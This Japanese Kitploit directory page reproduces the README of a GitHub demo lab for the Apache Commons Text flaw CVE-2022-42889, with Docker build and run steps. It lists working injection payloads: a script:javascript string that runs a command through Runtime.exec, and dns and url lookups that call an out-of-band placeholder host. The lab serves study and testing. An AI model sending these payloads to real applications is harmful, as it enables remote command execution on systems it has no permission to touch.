Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-42889 — CVE-2022-42889用docker | Kitploit
ツール/GitHubGitHub/necroteddy/cve-2022-42889
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubnecroteddy/cve-2022-42889

CVE-2022-42889

CVE-2022-42889用docker

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-42889-POC

CVE-2022-42889 脆弱性を悪用する方法を示すシンプルなデモアプリケーションです。
OOB(Out of Band)サービスを利用して、dns および url プレフィックスを実演します。

commons-text 補間の JavaDocs: commons-text JavaDocs

補間の例

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

Rapid7 からの引用

この脆弱性は Log4Shell と比較されています。なぜなら、これはオープンソースライブラリレベルの脆弱性であり、関連オブジェクトを使用する多種多様なソフトウェアアプリケーションに影響を及ぼす可能性が高いからです。
しかし、初期分析によれば、これは誤った比較です。脆弱性の性質上、Log4Shell とは異なり、アプリケーションが Commons Text の脆弱なコンポーネントを使用して、信頼されていない、潜在的に悪意のある入力を処理するのは稀であることを示しています。

前提条件

  • docker
  • java
  • maven

Java と maven は、Docker Hub からイメージを取得する場合はスキップできます。

使用方法

アプリケーションのビルド

root@kitploit:~
mvn clean package

Docker イメージのビルド

root@kitploit:~
docker build -t cve-2022-42889-poc .

Docker イメージの実行

root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

アプリケーションにアクセスし、指示に従ってください

root@kitploit:~
open http://localhost:8081

詳細情報

  • NIST NVD
  • Rapid 7
ツールをダウンロード